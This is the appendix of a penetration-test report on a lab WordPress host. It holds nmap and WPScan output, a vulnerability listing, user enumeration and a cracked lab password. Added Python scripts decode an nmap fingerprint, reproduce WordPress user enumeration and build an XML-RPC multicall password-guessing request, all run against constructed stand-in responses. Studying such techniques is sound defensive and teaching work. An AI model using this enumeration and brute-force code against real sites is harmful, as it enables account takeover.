6. Appendix
6.1 nmap
Service and version detection
root@kali:~# nmap 192.168.178.134 -sV
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-14 19:04 EST
Nmap scan report for yilmaz-VirtualBox.fritz.box (192.168.178.134)
Host is up (0.00017s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      ProFTPD
22/tcp   open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.41 ((Unix) OpenSSL/1.1.1d PHP/7.3.11 mod_perl/2.0.8-dev Perl/v5.16.3)
443/tcp  open  ssl/http Apache httpd 2.4.41 ((Unix) OpenSSL/1.1.1d PHP/7.3.11 mod_perl/2.0.8-dev Perl/v5.16.3)
3306/tcp open  mysql?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.80%I=7%D=11/14%Time=5DCDEB9A%P=x86_64-pc-linux-gnu%r(N
SF:ULL,4D,"I\0\0\x01\xffj\x04Host\x20'kali\.fritz\.box'\x20is\x20not\x20al
SF:lowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(RTSPReque
SF:st,4D,"I\0\0\x01\xffj\x04Host\x20'kali\.fritz\.box'\x20is\x20not\x20all
SF:owed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
MAC Address: 08:00:27:42:4E:2B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.24 seconds
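nmap labels 3306/tcp only as "mysql?" because the service answered its probes with an error instead of a handshake, yet the fingerprint it printed already contains the answer. The following script is an added example and not part of the original report or of nmap: it re-joins the SF lines copied from the scan above, undoes nmap's escaping, and parses the response as a MySQL wire-protocol ERR packet (3-byte little-endian length, 1-byte sequence id, 0xff marker, 2-byte error code, message). The decoded packet carries error 1130 (ER_HOST_NOT_PRIVILEGED in the MySQL error catalogue) from a MariaDB server, i.e. the scanning host is rejected by the server's host-based grant table, which is why no version banner could be obtained. The function names and the NMAP_SF constant are this example's own.

```python
import re
import struct

# Copy of the SF fingerprint lines printed by the nmap -sV run above, wrapped
# exactly as nmap prints them (continuation lines carry an "SF:" prefix).
NMAP_SF = r'''
SF-Port3306-TCP:V=7.80%I=7%D=11/14%Time=5DCDEB9A%P=x86_64-pc-linux-gnu%r(N
SF:ULL,4D,"I\0\0\x01\xffj\x04Host\x20'kali\.fritz\.box'\x20is\x20not\x20al
SF:lowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(RTSPReque
SF:st,4D,"I\0\0\x01\xffj\x04Host\x20'kali\.fritz\.box'\x20is\x20not\x20all
SF:owed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
'''

ER_HOST_NOT_PRIVILEGED = 1130  # MySQL/MariaDB: "Host '...' is not allowed to connect"

# One %r(PROBE,HEXLEN,"escaped response") entry of the fingerprint.
RESP_RE = re.compile(r'%r\((\w+),([0-9A-Fa-f]+),"((?:[^"\\]|\\.)*)"\)')


def join_sf_lines(text):
    # nmap wraps the fingerprint; every continuation line starts with "SF:".
    parts = []
    for line in text.strip().splitlines():
        line = line.strip()
        if line.startswith("SF-"):
            parts.append(line)
        elif line.startswith("SF:"):
            parts.append(line[3:])
    return "".join(parts)


def unescape_sf(s):
    # nmap escaping: \xHH -> byte, \0 -> NUL, \n \r \t -> control char,
    # any other backslash-escaped char (\. \" \\) -> the char itself.
    buf = bytearray()
    i = 0
    while i < len(s):
        c = s[i]
        if c != "\\":
            buf.append(ord(c))
            i += 1
            continue
        e = s[i + 1]
        if e == "x":
            buf.append(int(s[i + 2:i + 4], 16))
            i += 4
        elif e == "0":
            buf.append(0)
            i += 2
        elif e in "nrt":
            buf.append({"n": 10, "r": 13, "t": 9}[e])
            i += 2
        else:
            buf.append(ord(e))
            i += 2
    return bytes(buf)


def parse_fingerprint(text):
    # Returns (port, proto, nmap_version, [(probe, raw_bytes), ...]) and checks
    # every decoded response against the hex length nmap recorded for it.
    joined = join_sf_lines(text)
    m = re.match(r"SF-Port(\d+)-(TCP|UDP):V=([^%]+)", joined)
    if not m:
        raise ValueError("not an nmap SF fingerprint")
    responses = []
    for probe, hexlen, body in RESP_RE.findall(joined):
        data = unescape_sf(body)
        if len(data) != int(hexlen, 16):
            raise ValueError(f"length mismatch for probe {probe}")
        responses.append((probe, data))
    return int(m.group(1)), m.group(2), m.group(3), responses


def parse_mysql_error_packet(data):
    # MySQL packet: 3-byte LE payload length, 1-byte sequence id, payload.
    # An ERR payload starts with 0xff, then a 2-byte LE error code and the text.
    length = int.from_bytes(data[0:3], "little")
    seq = data[3]
    payload = data[4:4 + length]
    if len(payload) != length or payload[0] != 0xFF:
        return None
    code = struct.unpack("<H", payload[1:3])[0]
    msg = payload[3:]
    if msg[:1] == b"#":  # optional '#' + 5-char SQLSTATE (protocol 4.1 servers)
        msg = msg[6:]
    return {"seq": seq, "code": code, "message": msg.decode("latin-1")}


def identify_service(text=NMAP_SF):
    # Decode the first probe response and explain why nmap saw no banner.
    port, proto, version, responses = parse_fingerprint(text)
    probe, data = responses[0]
    err = parse_mysql_error_packet(data)
    if err is None:
        raise ValueError("response is not a MySQL ERR packet")
    return {
        "port": port,
        "proto": proto,
        "nmap_version": version,
        "probe": probe,
        "error_code": err["code"],
        "host_acl_reject": err["code"] == ER_HOST_NOT_PRIVILEGED,
        "is_mariadb": "MariaDB" in err["message"],
        "message": err["message"],
    }


if __name__ == "__main__":
    print(identify_service())
```

Both probe responses (NULL and RTSPRequest) decode to the same 77-byte packet, so the server answers every client from kali.fritz.box identically before any authentication; a follow-up from a host that is allowed by the grant table, or from the web server itself, would be needed to get a version string.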
Operating system detection
root@kali:~# nmap 192.168.178.134 -O
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-14 19:06 EST
Nmap scan report for yilmaz-VirtualBox.fritz.box (192.168.178.134)
Host is up (0.00037s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
443/tcp  open  https
3306/tcp open  mysql
MAC Address: 08:00:27:42:4E:2B (Oracle VirtualBox virtual NIC)
Aggressive OS guesses: Linux 3.2 - 4.9 (96%), Linux 2.6.32 - 3.10 (96%), Linux 2.6.32 (96%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Synology DiskStation Manager 5.2-5644 (94%), Linux 2.6.32 - 2.6.35 (94%), Linux 2.6.32 - 3.5 (94%), Linux 2.6.32 - 3.13 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.47 seconds
6.2 WPScan: General Results
root@kali:~# wpscan --url 192.168.56.101/wordpress --enumerate p --wp-plugins-dir wp-content/plugins --plugins-detection aggressive
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.6.3
       Sponsored by Sucuri - https://sucuri.net
       @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: http://192.168.56.101/wordpress/
[+] Started: Sun Nov 24 06:15:18 2019
Apache server 2.4.41
[+] http://192.168.56.101/wordpress/
| Interesting Entries:
| - Server: Apache/2.4.41 (Unix) OpenSSL/1.1.1d PHP/7.3.11 mod_perl/2.0.8-dev Perl/v5.16.3
| - X-Powered-By: PHP/7.3.11
| Found By: Headers (Passive Detection)
| Confidence: 100%
WordPress XML-RPC
[+] http://192.168.56.101/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
References:
WordPress README
[+] http://192.168.56.101/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
WordPress CRON
[+] http://192.168.56.101/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
References:
WordPress version 4.3.18
[+] WordPress version 4.3.18 identified (Insecure, released on 2018-12-13).
| Detected By: Emoji Settings (Passive Detection)
| - http://192.168.56.101/wordpress/, Match: '-release.min.js?ver=4.3.18'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.101/wordpress/, Match: 'WordPress 4.3.18'
6.3 WPScan: Identified Vulnerabilities for CMS WordPress Version 4.3.18
Authenticated Code Execution (CVE-2019-8942, CVE-2019-8943)
| [!] Title: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution
| Fixed in: 5.0.1
Description:
An attacker who gains access to an account with at least author privileges on a target WordPress site can execute arbitrary PHP code on the underlying server, leading to a full remote takeover.
References:
Comment Cross-Site Scripting (XSS) (CVE-2019-9787)
| [!] Title: WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS)
| Fixed in: 4.3.19
Description:
An attacker can take over any WordPress site that has comments enabled by tricking an administrator of a target blog to visit a website set up by the attacker. As soon as the victim administrator visits the malicious website, a cross-site request forgery (CSRF) exploit is run against the target WordPress blog in the background, without the victim noticing. The CSRF exploit abuses multiple logic flaws and sanitization errors that when combined lead to Remote Code Execution and a full site takeover.
References:
Cross-Site Scripting (XSS) in URL Sanitisation (CVE-2019-16222)
| [!] Title: WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation
| Fixed in: 4.3.20
Description:
WordPress before 5.2.3 has an issue with URL sanitization in wp_kses_bad_protocol_once in wp-includes/kses.php that can lead to cross-site scripting (XSS) attacks.
References:
Stored XSS in Customizer (CVE-2019-17674)
| [!] Title: WordPress <= 5.2.3 - Stored XSS in Customizer
| Fixed in: 4.3.21
Description:
WordPress before 5.2.4 is vulnerable to stored XSS (cross-site scripting) via the Customizer.
References:
Unauthenticated View Private/Draft Posts (CVE-2019-17671)
| [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
| Fixed in: 4.3.21
Description:
This vulnerability could allow an unauthenticated user to view private or draft posts due to an issue within WP_Query.
References:
Stored XSS in Style Tags (CVE-2019-17672)
| [!] Title: WordPress <= 5.2.3 - Stored XSS in Style Tags
| Fixed in: 4.3.21
Description:
WordPress before 5.2.4 is vulnerable to a stored XSS attack to inject JavaScript into STYLE elements.
References:
JSON Request Cache Poisoning (CVE-2019-17673)
| [!] Title: WordPress <= 5.2.3 - JSON Request Cache Poisoning
| Fixed in: 4.3.21
Description:
WordPress before 5.2.4 is vulnerable to poisoning of the cache of JSON GET requests because certain requests lack a Vary: Origin header.
References:
Server-Side Request Forgery (SSRF) in URL Validation (CVE-2019-17669, CVE-2019-17670)
| [!] Title: WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation
| Fixed in: 4.3.21
Description:
WordPress before 5.2.4 has a Server Side Request Forgery (SSRF) vulnerability because URL validation does not consider the interpretation of a name as a series of hex characters.
WordPress before 5.2.4 has a Server Side Request Forgery (SSRF) vulnerability because Windows paths are mishandled during certain validation of relative URLs.
References:
Admin Referrer Validation (CVE-2019-17675)
| [!] Title: WordPress <= 5.2.3 - Admin Referrer Validation
| Fixed in: 4.3.21
Description:
WordPress before 5.2.4 does not properly consider type confusion during validation of the referer in the admin pages, possibly leading to CSRF.
References:
[i] The main theme could not be detected.
6.4 WPScan: Identified Vulnerabilities for the WordPress Plugins
Akismet: Unauthenticated Stored Cross-Site Scripting (XSS) (CVE-2015-9357)
[+] akismet
| Location: http://192.168.56.101/wordpress/wp-content/plugins/akismet/
| Latest Version: 4.1.3
| Last Updated: 2019-11-13T20:46:00.000Z
|
| Detected By: Known Locations (Aggressive Detection)
| [!] 1 vulnerability identified:
|
| [!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
| Fixed in: 3.1.5
Description:
The akismet plugin before 3.1.5 for WordPress has XSS.
References:
| The version could not be determined.
WP-database-backup Version 2.1.1
| Location: http://192.168.56.101/wordpress/wp-content/plugins/wp-database-backup/
| Last Updated: 2019-10-06T06:09:00.000Z
| Readme: http://192.168.56.101/wordpress/wp-content/plugins/wp-database-backup/readme.txt
| [!] The version is out of date, the latest version is 5.4.1
|
| Detected By: Known Locations (Aggressive Detection)
| Version: 2.1.1 (50% confidence)
| Detected By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.101/wordpress/wp-content/plugins/wp-database-backup/readme.txt
| [!] 6 vulnerabilities identified:
WP-database-backup: Authenticated Stored Cross-Site Scripting (XSS)
| [!] Title: WP Database Backup <= 3.3 - Authenticated Stored Cross-Site Scripting (XSS)
| Fixed in: 3.4
Description:
Persistent Cross-Site Scripting (XSS): Authenticated administrators can store arbitrary html/js code (there is no CSRF protection).
References:
WP-database-backup: Cross-Site Request Forgery (CSRF)
| [!] Title: WP Database Backup <= 4.3.5 - Cross-Site Request Forgery (CSRF)
| Fixed in: 4.3.6
Description:
The detected version is vulnerable to Cross-Site Request Forgery (CSRF).
References:
WP-database-backup: Unauthenticated OS Command Injection
| [!] Title: WP Database Backup <= 5.1.2 - Unauthenticated OS Command Injection
| Fixed in: 5.2
Description:
In unpatched versions of WP Database Backup, an attacker is able to inject operating system (OS) commands arbitrarily, which are then executed when the plugin performs a database backup. Injected commands would persist until manually removed, executing each time a backup is run.
References:
WP-database-backup: XSS (CVE-2019-14949)
| [!] Title: WP Database Backup < 5.1.2 - XSS
| Fixed in: 5.1.2
Description:
The wp-database-backup plugin before 5.1.2 for WordPress has XSS.
References:
WP Database Backup < 4.3.3 - CSRF & XSS
| [!] Title: WP Database Backup < 4.3.3 - CSRF & XSS
| Fixed in: 4.3.3
References:
WP Database Backup < 4.3.1 - CSRF & XSS (CVE-2016-10875)
| [!] Title: WP Database Backup < 4.3.1 - CSRF & XSS
| Fixed in: 4.3.1
Description:
The detected version is vulnerable to CSRF & XSS.
References:
6.5 WPScan: User Enumeration
root@kali:~# wpscan --url 192.168.56.101/wordpress --enumerate u
[+] URL: http://192.168.56.101/wordpress/
[+] Started: Sun Nov 24 06:15:54 2019
[…]
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:02 <==> (10 / 10) 100.00% Time: 00:00:02
[i] User(s) Identified:
berlino_admin
[+] berlino_admin
| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
berlino_author
[+] berlino_author
| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
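The two detection methods WPScan names above are simple enough to reproduce by hand. The following script is an added example, not part of the original report or of WPScan: it walks author IDs 1 to 10 the way "Author Id Brute Forcing" does, reads the user slug out of the redirect that WordPress issues for /?author=N (or out of the author-<slug> body class when the site does not redirect), and then confirms each slug with the "Login Error Messages" method, which relies on wp-login.php of the 4.3 branch answering a wrong password with "Invalid username." for unknown names and "The password you entered for the username X is incorrect." for existing ones. All HTTP responses are constructed stand-ins (FAKE_*) built from the two users found above; no request is sent, and the helper names are this example's own.

```python
import re
from urllib.parse import urlparse

# Constructed stand-in for the target: what GET /?author=N returned for the IDs
# WPScan brute-forced (1..10). WordPress answers an existing ID with a redirect
# to /author/<user_nicename>/ and an unused one with a 404.
FAKE_AUTHOR_RESPONSES = {
    1: (301, {"Location": "http://192.168.56.101/wordpress/author/berlino_admin/"}, ""),
    2: (301, {"Location": "http://192.168.56.101/wordpress/author/berlino_author/"}, ""),
}
# Constructed archive page for a site that serves /?author=N without redirecting
# (plain permalinks): the slug still leaks through the author-<slug> body class.
FAKE_AUTHOR_BODY = '<body class="archive author author-berlino_admin author-1 logged-out">'
# Constructed set of login names the fake wp-login.php treats as existing accounts.
FAKE_VALID_LOGINS = {"berlino_admin", "berlino_author"}

AUTHOR_PATH_RE = re.compile(r"/author/([^/]+)/?$")
BODY_CLASS_RE = re.compile(r'<body[^>]*\bclass="([^"]*)"')


def slug_from_author_response(status, headers, body):
    """Author slug from one /?author=N answer: redirect target first, the
    'author-<slug>' body class as fallback; None when the ID is unused."""
    if status in (301, 302) and "Location" in headers:
        m = AUTHOR_PATH_RE.search(urlparse(headers["Location"]).path)
        if m:
            return m.group(1)
    m = BODY_CLASS_RE.search(body)
    if m:
        for cls in m.group(1).split():
            tail = cls[len("author-"):]
            if cls.startswith("author-") and tail and not tail.isdigit():
                return tail
    return None


def enumerate_author_ids(fetch, first=1, last=10):
    """WPScan's 'Author Id Brute Forcing': walk IDs first..last and collect the
    slugs; fetch(author_id) -> (status, headers, body)."""
    found = []
    for author_id in range(first, last + 1):
        slug = slug_from_author_response(*fetch(author_id))
        if slug and slug not in found:
            found.append(slug)
    return found


def classify_login_error(html):
    """WPScan's 'Login Error Messages' confirmation: WordPress 4.x answers a wrong
    password with different text for unknown and for existing user names."""
    text = re.sub(r"<[^>]+>", "", html)
    if "Invalid username" in text:
        return "unknown"
    if "The password you entered for the username" in text:
        return "valid"
    return "undetermined"


def fake_fetch_author(author_id):
    # Stand-in for GET /?author=N against the target.
    return FAKE_AUTHOR_RESPONSES.get(
        author_id, (404, {}, '<html><body class="error404"></body></html>'))


def fake_login(username, password):
    # Stand-in for POST wp-login.php, mirroring the two 4.3-branch error messages.
    if username in FAKE_VALID_LOGINS:
        return (f'<div id="login_error"><strong>ERROR</strong>: The password you entered '
                f'for the username <strong>{username}</strong> is incorrect.</div>')
    return '<div id="login_error"><strong>ERROR</strong>: Invalid username.</div>'


def enumerate_users(fetch_author=fake_fetch_author, login=fake_login, first=1, last=10):
    """Both WPScan steps in sequence: harvest slugs, then try each as a login
    name with a junk password and keep what the error message says about it."""
    return {slug: classify_login_error(login(slug, "definitely-not-the-password"))
            for slug in enumerate_author_ids(fetch_author, first, last)}


if __name__ == "__main__":
    for name, state in enumerate_users().items():
        print(f"{name}: {state}")
```

The confirmation step matters because the slug WordPress exposes is the user_nicename, which an administrator can set independently of the login name; only the login error message ties a slug to an account that wp-login.php actually accepts. On this target both users are confirmed, which is what the WPScan output above reports.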
6.6 WordPress Password Attack
root@kali:/usr/share/wordlists# wpscan --url 192.168.56.101/wordpress --passwords '/usr/share/wordlists/fasttrack.txt' --usernames berlino_author
[+] URL: http://192.168.56.101/wordpress/
[+] Started: Fri Dec 13 06:08:20 2019
[…]
[+] Performing password attack on Xmlrpc Multicall against 1 user/s
Progress Time: 00:00:00 <==============================================================> (0 / 0) 100.0% Time: 00:00:00
WARNING: Your progress bar is currently at 0 out of 0 and cannot be incremented. In v2.0.0 this will become a ProgressBar::InvalidProgressError.
Progress Time: 00:00:00 <==============================================================> (0 / 0) 100.0% Time: 00:00:00
[SUCCESS] - berlino_author / 123456
All Found
[i] Valid Combinations Found:
| Username: berlino_author, Password: 123456
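WPScan's "Xmlrpc Multicall" mode, visible in the output above, packs many password guesses into a single POST to xmlrpc.php: a system.multicall request whose sub-calls each invoke an authenticated method (wp.getUsersBlogs) with a different password, so one round trip tests the whole batch. The following script is an added example, not part of the original report or of WPScan, and sends nothing: it builds that request with Python's standard xmlrpc.client, answers it with a constructed stand-in for the target's xmlrpc.php (fault 403 "Incorrect username or password." for wrong guesses, a blog list for the right one, with 123456 chosen as the valid password to match the finding above), maps the results back to the candidates, and finally shows the defender-side check of counting login attempts per request body. The candidate list, the fake server and the helper names are this example's own.

```python
import xmlrpc.client

# Constructed inputs standing in for the target and the wordlist.
TARGET_USER = "berlino_author"
CANDIDATES = ["password", "admin", "letmein", "123456", "qwerty"]  # fasttrack-style guesses
LOGIN_METHODS = {"wp.getUsersBlogs"}  # any authenticated method works; WPScan uses this one


def build_multicall(username, candidates):
    """One XML-RPC request carrying one wp.getUsersBlogs login attempt per
    candidate password: the amplification behind the 'Xmlrpc Multicall' mode."""
    calls = [{"methodName": "wp.getUsersBlogs", "params": [username, pw]}
             for pw in candidates]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall")


def fake_xmlrpc_php(request_xml, valid_password="123456"):
    """Constructed stand-in for the target's xmlrpc.php: answers each sub-call the
    way WordPress does (fault 403 for bad credentials, a blog list otherwise)."""
    (calls,), method = xmlrpc.client.loads(request_xml)
    if method != "system.multicall":
        raise ValueError("only system.multicall is emulated here")
    results = []
    for call in calls:
        user, pw = call["params"]
        if call["methodName"] in LOGIN_METHODS and user == TARGET_USER and pw == valid_password:
            blog = {"isAdmin": False, "blogid": "1", "blogName": "berlino",
                    "url": "http://192.168.56.101/wordpress/",
                    "xmlrpc": "http://192.168.56.101/wordpress/xmlrpc.php"}
            results.append([[blog]])  # multicall wraps each success in a one-element array
        else:
            results.append({"faultCode": 403,
                            "faultString": "Incorrect username or password."})
    return xmlrpc.client.dumps((results,), methodresponse=True)


def passwords_accepted(response_xml, candidates):
    """Map each sub-result back to its candidate: a struct carrying faultCode is a
    failed guess, anything else means the credentials were accepted."""
    (results,), _ = xmlrpc.client.loads(response_xml)
    return [pw for pw, r in zip(candidates, results)
            if not (isinstance(r, dict) and "faultCode" in r)]


def run_attack(username=TARGET_USER, candidates=CANDIDATES, server=fake_xmlrpc_php):
    """Single round trip: build the multicall, hand it to the server, read the hits."""
    return passwords_accepted(server(build_multicall(username, candidates)), candidates)


def count_login_attempts(request_xml):
    """Defender's view: how many credential checks one POST body carries.
    A value far above 1 is the signature of multicall amplification."""
    params, method = xmlrpc.client.loads(request_xml)
    if method == "system.multicall":
        return sum(1 for c in params[0] if c.get("methodName") in LOGIN_METHODS)
    return 1 if method in LOGIN_METHODS else 0


if __name__ == "__main__":
    req = build_multicall(TARGET_USER, CANDIDATES)
    print(f"{count_login_attempts(req)} login attempts in one request")
    print("accepted:", run_attack())
```

Two points a practitioner should take from this. First, the amplification is what makes a tiny wordlist such as fasttrack.txt cost the attacker almost nothing: the whole list travels in a handful of requests, so per-request rate limiting on wp-login.php does not help unless xmlrpc.php is covered too. Second, WordPress 4.4 started refusing further login attempts within the same multicall once one has failed, so this shortcut works against the 4.3.18 installation found here but not against current versions; disabling or blocking xmlrpc.php where it is not needed removes the surface entirely.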
6.7 nessus: Basic Network Scan
The detailed results of the Basic Network Scan can be found here: nessus: Basic Network Scan
6.8 nessus: Web Application Test
The detailed results of the Web Application Test can be found here: nessus: Web Application Test